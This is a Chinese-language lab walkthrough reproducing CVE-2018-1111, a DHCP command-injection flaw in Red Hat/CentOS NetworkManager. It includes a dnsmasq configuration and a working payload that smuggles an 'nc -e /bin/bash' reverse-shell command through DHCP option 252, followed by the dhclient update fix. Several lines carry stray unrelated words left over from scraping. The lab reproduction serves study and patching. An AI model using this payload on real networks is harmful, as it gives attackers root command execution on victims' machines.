DHCP命令執行CVE-2018-1111漏洞復現

DHCP命令執行_CVE-2018-1111漏洞復現shell

1、漏洞描述centos

在Red Hat Enterprise Linux多個版本的DHCP客戶端軟件包所包含的NetworkManager集成腳本中發現了命令注入漏洞,攻擊者能夠經過本地網絡上的惡意DHCP服務器或者使用惡意的虛假DHCP響應來利用此漏洞進行攻擊,一旦攻擊成功,則能夠在配置了DHCP的NetworkManager的系統上以root權限執行任意命令。瀏覽器

2、漏洞影響版本bash

  Red hat 6.x、7.x服務器

Centos 6.x、7.x網絡

3、漏洞復現環境搭建測試

測試環境:攻擊機:kali     目標機(靶機):centos7url

  1. 配置虛擬網絡,設置僅主機模式、關閉dhcp
  2. 將攻擊機和靶機網絡配置成僅主機模式

  

3.kali(攻擊機)搭建dhcp服務centos7

3.1先在kali下設置網絡(配置ip和網關)spa

  

3.2在當前目錄新建一個dnsmasq.conf文件,寫入如下內容進行配置:

bind-interfaces interface=eth0 except-interface=lo dhcp-range=192.168.2.20,192.168.2.30,12h     #dhcp-range:表示要分配給客戶機的ip地址範圍和租約時間 dhcp-option=3,192.168.2.11      #dhcp-option 表示指定給DHCP客戶端的選項信息,3:表示設置網關地址選項 dhcp-option=6,192.168.2.11      #6:表示設置DNS服務器地址選項 log-queries log-facility=/var/log/dnsmasq.log   #表示日誌記錄器

  

4.漏洞利用payload

dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.2.11 8888 #"

252:表示爲DHCP客戶端提供了一個用於配置其代理設置的url, wpad-proxy-url

payload 中涉及到的 option 252 是私人使用保留部分的一部分, 爲 dhcp 服務器使用 252,而後在他們的瀏覽器中寫入與 dhcp 服務器交談的能力,並要求代碼 252 從該選項列出的 URL 中獲取關於網絡上代理設置的信息

  

5.kali開啓監聽

  

6.centos(靶機)重啓網絡服務,kali接收到反彈shell

  

4、漏洞防護

更新dhcp

yum -y update dhclient

相關文章
相關標籤/搜索